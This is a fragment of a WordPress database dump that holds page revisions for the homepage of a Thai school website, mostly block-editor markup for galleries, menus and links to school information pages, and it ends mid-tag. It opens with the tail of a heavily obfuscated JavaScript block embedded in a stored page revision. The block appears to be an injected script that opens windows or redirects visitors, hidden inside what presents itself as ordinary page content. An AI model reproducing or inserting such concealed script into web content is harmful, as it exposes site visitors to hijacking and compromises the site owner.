_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 21:42:30','2024-08-08 14:42:30','',14,'http://pakhaeng.ssk.in.th/?p=761',0,'revision','',0),
(763,1,'2024-08-08 21:43:28','2024-08-08 14:43:28','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":757,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-1.png\" alt=\"\" class=\"wp-image-757\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" 